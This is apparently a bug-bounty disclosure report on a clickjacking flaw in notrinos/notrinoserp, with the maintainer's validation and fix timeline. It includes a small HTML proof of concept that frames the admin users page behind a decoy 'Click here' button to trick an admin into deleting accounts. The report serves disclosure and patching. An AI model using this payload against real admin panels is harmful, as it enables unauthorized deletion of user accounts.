Clickjacking Leads To User Deletion in notrinos/notrinoserp

Valid

Reported on

Aug 21st 2022

Hello team, on notrinoserp there is no clickjacking protection implemented x-frame-options, so an attacker can perform clickjacking attack, and in this case im able to delete user account via this vulnerability from the admin account, here is the POC:

Exploit Script:

<style>
    iframe {
        position:relative;
        width:1200px;
        height: 650px;
        opacity: 0.4;
        z-index: 2;
    }
    div {
        position:absolute;
        top:183px;
        left:880px;
        z-index: 1;
    }
</style>
<div>Click here</div>
<iframe src="http://127.0.0.1:4445/admin/users.php?"></iframe>

Patch Recommendation:

Add X-Frameheader to prevent clickjacking/UI Redressing attacks


# Impact

1. An attacker can delete users account via exploiting this vulnerability via misleading the admin

We are processing your report and will contact the notrinos/notrinoserp team within 24 hours. a year ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago

We have contacted a member of the notrinos/notrinoserp team and are waiting to hear back a year ago

Phương gave praise a year ago

Thanks @akshayravic09yc47 for detecting this vulnerability, it will be fixed soon.

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

Phương assigned a CVE to this report a year ago

Phương validated this vulnerability a year ago

Akshay Ravi has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Phương marked this as fixed in 0.7 with commit c2ff3d a year ago

Phương has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation